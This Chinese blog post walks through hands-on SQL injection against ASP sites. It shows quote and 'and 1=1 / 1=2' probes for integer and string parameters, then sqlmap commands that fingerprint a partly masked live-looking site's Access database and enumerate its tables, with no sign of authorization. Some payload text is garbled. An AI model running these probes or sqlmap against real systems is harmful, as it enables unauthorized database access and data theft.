网站的SQL注入实战

sql注入是黑客常用的手段之一,最近装了kali系统,所以体会了一把sql注入的感觉,有点体会记录如下:

首先我们来看一下如何判断一个网站是可以进行sql注入

为了把问题说明清楚,以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY为例进行分析,YY可能是整型,也有可能是字符串。
1.整型参数的判断:
    当输入的参数YY为整型时,通常abc.asp中SQL语句原貌大致如下:select * from 表名 where 字段=YY,所以可以用以下步骤测试SQL注入是否存在。
    ①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一个单引号),此时abc.ASP中的SQL语句变成了select * from 表名 where 字段=YY’,abc.asp运行异常;
    ②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同;
    ③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp运行异常;
如果以上三步全面满足,abc.asp中一定存在SQL注入漏洞。
2、字符串型参数的判断:
    当输入的参数YY为字符串时,通常abc.asp中SQL语句原貌大致如下:select * from 表名 where 字段=’YY’,所以可以用以下步骤测试SQL注入是否存在。
    ①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一个单引号),此时abc.ASP中的SQL语句变成了select * from 表名 where 字段=YY’,abc.asp运行异常;
  ②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb … 39;1’=’1’, abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asp?p=YY运行结果相同;
    ③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb … 39;1’=’2’, abc.asp运行异常;
如果以上三步全面满足,abc.asp中一定存在SQL注入漏洞。

注入过程:

打开sqlmap,先把url丢给sqlmap去跑,命令:

sqlmap -u "www.xxxx.cn/jiazheng_l.asp?id=455"

这里写图片描述
结果:

从图中我们可以看出,这个注入点提交的类型是get型,数据库为Microsoft Access,系统是Windows,接下来我们试试列出它的数据库。执行如下命令:

sqlmap -u "www.xxxx.cn/jiazheng_l.asp?id=455" --dbs

结果:提示Access数据库不能建库,要使用 –tables参数
这里写图片描述
所以我们改变命令:

sqlmap -u "www.xxxxx.cn/jiazheng_l.asp?id=455" --tables

结果如下:
这里写图片描述
最后跑出来了:
这里写图片描述

  • 3
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值